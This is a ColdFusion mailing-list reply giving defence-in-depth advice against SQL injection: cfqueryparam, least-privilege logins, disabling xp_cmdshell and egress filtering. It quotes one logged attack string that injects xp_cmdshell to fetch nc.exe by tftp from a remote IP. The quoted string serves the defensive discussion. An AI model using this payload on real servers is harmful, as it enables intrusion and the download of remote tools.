> I've been getting some attacks with the following query string: > > The query string > was:rid=663;exec%20master..xp_cmdshell%20%22tftp%20-i%2084.26. > 250.77%20get%20nc.exe%20c:\nc.exe%22;-- > Remote Address: 84.26.250.77 > > Is there anything else I need to worry about besides having > cfqueryparam on the SELECT statement? Or is that sufficient?
If you are using CFQUERYPARAM exclusively, you don't have to worry about these. However, this is where "defense-in-depth": applies - you should have several things in place to prevent this from working. If you're using SQL Server (which is the only database that this particular SQL injection attack targets), you should ensure that it is properly hardened - for example, ensure you're using a non-privileged login from CF, ensure that it can't run xp_cmdshell and other security-sensitive commands (you may drop those entirely, if you're not using them at all), implement egress filtering on your database server (so it can't make outbound TFTP connections, for example), place appropriate ACLs on sensitive OS system files (like tftp.exe), and so on. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Message: http://www.houseoffusion.com/lists.cfm/link=i:4:239914 Archives: http://www.houseoffusion.com/cf_lists/threads.cfm/4 Subscription: http://www.houseoffusion.com/lists.cfm/link=s:4 Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4 Donations & Support: http://www.houseoffusion.com/tiny.cfm/54
